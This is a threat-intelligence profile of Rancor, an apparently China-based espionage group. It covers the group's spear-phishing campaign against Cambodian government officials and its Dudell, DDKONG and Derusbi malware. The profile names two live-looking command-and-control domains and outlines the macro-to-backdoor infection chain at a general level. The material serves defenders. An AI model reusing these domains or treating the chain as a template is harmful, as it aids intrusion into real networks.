Cyber Threat Actor: Rancor
| Actor Type | Location | Known Incidents |
Spy
|
China
|
1 incident |
|---|
Profile
Rancor is acyber espionage group that has been tracked under the alias Rancor and is associated with China as its known location. The group’s activities have been observed primarily in Southeast Asia, with a focus on government entities in Cambodia. Public reporting describes Rancor as conducting espionage‑motivated operations aimed at gathering sensitive information from targeted administrations. These objectives are explicitly characterized as cyber espionage rather than financial gain or disruptive intent.
The group’s typical initial access vector involves spear‑phishing emails that contain weaponized documents designed to lure victims into enabling malicious content. Once a user enables the embedded macro, the Dudell malware family executes and downloads a secondary payload via msiexec. Following Dudell, the DDKONG remote access Trojan is deployed; it creates a hidden window to evade detection before establishing communication with command‑and‑control servers at domains such as cswksfwq.kfesv.xyz and connect.bafunpda.xyz. The Derusbi backdoor Trojan complements this chain by requiring a decryption key and persisting through Windows registry modifications. Together, these custom malware families illustrate a tooling style that relies on macro‑based delivery, stealthy communication, and registry‑based persistence.
A representative operation attributed to Rancor occurred between December 2018 and January 2019, when the group targeted Cambodian government officials with the described spear‑phishing chain. During this campaign, the attackers leveraged the three malware families to gain unauthorized access to systems and exfiltrate data, using the aforementioned C2 domains for covert communication. Security researchers noted that blocking those domains and updating threat prevention platforms to detect Dudell, DDKONG, and Derusbi were effective mitigations against the activity. This incident underscores the group’s focus on sustained access to governmental networks in the region for intelligence collection.